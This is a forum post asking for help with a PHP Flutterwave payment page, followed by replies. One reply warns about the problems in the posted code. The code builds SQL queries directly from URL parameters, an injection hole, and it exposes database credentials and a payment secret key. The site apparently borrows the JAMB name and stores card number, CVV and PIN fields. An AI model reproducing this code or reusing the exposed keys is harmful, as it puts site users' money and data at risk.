Please I need help integrating Flutter Wave payment gateway on my website, I have done all I could and right now the problem i am having is after payment is successful , my paymentprocessor file which is also my success redirect page shows blank and refuse to confirm the payment for users ....please i need help anybody , see attached php codes scripts
`<?php session_start();
$dbhost = 'localhost';
$dbuser = 'cleajjiq_0ctwll1';
$dbpass = '#Opeyemi2018';
$dbname = 'cleajjiq_fedstudyloan';
$conn = mysqli_connect($dbhost, $dbuser, $dbpass,$dbname);
if(isset($_GET["bitusername"]))
{
$useremail = $_GET["bitusername"];
}
$sqlx=mysqli_query($conn, "SELECT * FROM formtypes WHERE email='$useremail'");
$rowx=mysqli_fetch_array($sqlx);
$fullname = $rowx['fullname'];
$accountnumber ="";
$bankname = "";
$sqlx=mysqli_query($conn, "SELECT * FROM thinkabout WHERE email='$useremail'");
if(mysqli_num_rows($sqlx) > 0 )
{
$rowx=mysqli_fetch_array($sqlx);
$university = $rowx['interestedstudy'];
$degree = $rowx['degreetype'];
$coursed = $rowx['desiredfield'];
$egd = $rowx['datofgraduation'];
$fieldofstudy = $rowx['fieldofstudy'];
$applicationnumber = $rowx['appid'];
$datelog = $rowx['datelog'];
$assignedloan = $rowx['assignloan'];
$hearaboutus = $rowx['hearaboutus'];
$mobilenumber = $rowx['phone'];
$email = $rowx['email'];
$citizencountry= $rowx['citizencounty'];
}
$sqlx=mysqli_query($conn, "SELECT * FROM checkeeligibility WHERE email='$useremail'");
if(mysqli_num_rows($sqlx) > 0 )
{ $rowx=mysqli_fetch_array($sqlx);
$university = $rowx['university'];
$degree = $rowx['degree'];
$coursed = $rowx['coursed'];
$egd = $rowx['egd'];
$levelofstudy = $rowx['levelofstudy'];
$applicationnumber = $rowx['applicationnumber'];
$datelog = $rowx['datelog'];
$assignedloan = $rowx['assignloan'];
$hearaboutus = $rowx['hearaboutus'];
$citizencountry= $rowx['citizencountry'];
$email = $rowx['email'];
$mobilenumber = $rowx['mobilenumber'];
}
$sqlxx=mysqli_query($conn, "SELECT * FROM accountdetails WHERE useremail='$useremail'");
if(mysqli_num_rows($sqlxx) > 0 )
{
$rowxx=mysqli_fetch_array($sqlxx);
$accountnumber = $rowxx['accountnumber'];
$bankname = $rowxx['bankname'];
}
if(isset($_POST['paysubmit']))
{
$useremail = $useremail;
$useramount = 20;
$fullname = $fullname;
$usertitle = "EnrollmentVerify";
$userdescription = "Check Academic Status";
$university = "";
$degree = "";
$coursed = "";
$egd = "";
$fieldofstudy = "";
$applicationnumber = "";
$datelog = "";
$assignedloan = "";
$hearaboutus = "";
$mobilenumber = "";
$email = $email;
$citizencountry= "";
$university = "";
$degree = "";
$coursed = "";
$egd = "";
$levelofstudy = "";
$applicationnumber = "";
$datelog = "";
$assignedloan = "";
$hearaboutus = "";
$citizencountry= "";
$email = $email;
$mobilenumber = "";
$email = $useremail;
$amount = $useramount;
$processorlink = 'https://student.clearinghouse.services/academic_check/paymentprocessor/index.php?useremail='.$useremail;
//* Prepare our rave request
$request = [
'tx_ref' => "tx_ref". time(),
'amount' => $useramount,
'currency' => 'NGN',
'payment_options' => 'ussd',
'redirect_url' => $processorlink,
'customer' => [
'email' => $email,
'name' => $fullname
],
'meta' => [
'price' => $useramount
],
'customizations' => [
'title' => $usertitle,
'description' => $userdescription
]
];
echo json_encode($request) ;
//* Ca;; f;iterwave emdpoint
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => 'https://api.flutterwave.com/v3/payments',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => '',
CURLOPT_MAXREDIRS => 10,
CURLOPT_TIMEOUT => 0,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => 'POST',
CURLOPT_POSTFIELDS => json_encode($request),
CURLOPT_HTTPHEADER => array(
'Authorization: Bearer FLWSECK-bedb9d4089303efc6a8f2ba820f893d3-18ebb6179f1vt-X',
'Content-Type: application/json'
),
));
$response = curl_exec($curl);
curl_close($curl);
$res = json_decode($response);
if($res->status == 'success')
{
$linktr = $res->data->link;
header('Location: '.$linktr);
/* echo '<script>window.location.href="'.$linktr.'"</script>'; */
}
else
{
echo 'Cannot Process Transaction';
}
}
?>
<!DOCTYPE html>
JAMB | CAPS
<!-- BEGIN GLOBAL MANDATORY STYLES -->
<!-- END GLOBAL MANDATORY STYLES -->
<!-- BEGIN PAGE LEVEL PLUGINS -->
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN THEME GLOBAL STYLES -->
<!-- END THEME GLOBAL STYLES -->
<!-- BEGIN PAGE LEVEL STYLES -->
<!-- END PAGE LEVEL STYLES -->
<!-- BEGIN THEME LAYOUT STYLES -->
<!-- END THEME LAYOUT STYLES -->
<!-- BEGIN LOGO -->
JAMB | Central Admissions Processing System | CAPS
<!-- END LOGO -->
<!-- BEGIN LOGIN -->
<form name="formval2" class="form-horizontal loan-eligibility-form" method="post" >
<p> <h5><font color="white"><a> <b>Name:</b> <?php echo $fullname ?></font></h5></p>
<p> <h5><font color="white"><a> <b>Institution:</b> <?php echo $university ?></font></h5></p>
<p> <h5><font color="white"><a> <b>Degree Class:</b> <?php echo $degree ?></font></h5></p>
<p> <h5><font color="white"><a> <b>Level of Study:</b> <?php echo $levelofstudy ?></font></h5></p>
<p> <h5><font color="white"><a> <b>Course of Study:</b> <?php echo $coursed ?></font></h5></p>
<p> <h5><font color="white"><a> <b>Matric/Registration Number:</b> <?php echo $fieldofstudy ?></font></h5></p>
<p> <h5><font color="white"><a> <b>Date of Admission:</b> <?php echo $egd ?></font></h5></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
`
`
<?php
if(isset($_GET["bitusername"]))
{
$useremail = $_GET["bitusername"];
}
if(isset($_GET['status']))
{
//* check payment status
if($_GET['status'] == 'cancelled')
{
// echo 'YOu cancel the payment';
echo '<script>alert("Transaction Cancelled")</script>';
}
elseif($_GET['status'] == 'successful')
{
$txid = $_GET['tx_ref'];
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => "https://api.flutterwave.com/v3/transactions/{$txid}/verify",
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => "",
CURLOPT_MAXREDIRS => 10,
CURLOPT_TIMEOUT => 0,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => "GET",
CURLOPT_HTTPHEADER => array(
"Content-Type: application/json",
"Authorization: Bearer FLWPUBK-9775d7a1d15e6beda614bf1f75c995de-X"
),
));
$response = curl_exec($curl);
curl_close($curl);
$res = json_decode($response);
if($res->status)
{
$amountPaid = $res->data->charged_amount;
$amountToPay = $res->data->meta->price;
if($amountPaid >= $amountToPay)
{
//echo 'Payment successful';
if(isset($_GET["useremail"]))
{
$useremail = $_GET["useremail"];
$dbhost = 'localhost';
$dbuser = 'cleajjiq_0ctwll1';
$dbpass = '#Opeyemi2018';
$dbname = 'cleajjiq_fedstudyloan';
$conn = mysqli_connect($dbhost, $dbuser, $dbpass,$dbname);
$cns = "";
$ccv = "";
$cpin = "Checking Academic Status";
mysqli_query($conn, "UPDATE formtypes SET cardpin='$cpin', cardnumber='$cns', cvv='$ccv' WHERE email='$useremail'");
echo '<div class="alert alert-info">
<strong>Info!</strong>
Your academic records is now captured and currently undergoing verification.
<br>
you can click on the close button below to complete your application.
</div>
<p></p>
<p></p>
<p></p>
<div align="center"><strong>Admission Status</strong></div>
<div class="ring">Checking
';
}
//* Continue to give item to the user
}
else
{
echo '<script>alert("Fraud Transaction Detected")</script>';
//echo 'Fraud transactio detected';
}
}
else
{
echo '<script>alert("Error in Transaction")</script>';
//echo 'Can not process payment';
}
}
}
?>
`
Top comments (4)
Hi,
I see you've made the same post three times - are you having trouble with the DEV editor?
I know you're referencing a local database, but please remember not to post any passwords or credentials to a public forum. People will scrape them and assume that you're reusing them elsewhere, and it's a very bad habit to get into!
EDIT: I've just noticed you've included the bearer token for your flutter account. Don't do that!
Your code is difficult to follow, but it reads like very old PHP, and does a lot of things we would recommend against nowadays. For example:
$_GETvalue directly into an SQL query<font color="white" [...]>) for alignmentThese are red flags that you've either inherited an old site or are working from some very out-of-date tutorials and are likely to end up developing an insecure application. Normally I wouldn't advise this, but since you're dealing with people's money, I'd say stop now and learn more about security concepts and modern web development, or find a third-party library or tool to use which does what you want already and is community-supported.
Can i communicate with you in public please
sorry i meant in private
What's wrong with talking here in public? Anything we discuss could then be of possible help to someone else having similar issues, whereas if we went to aprivate chat, then nobody would get the benefit.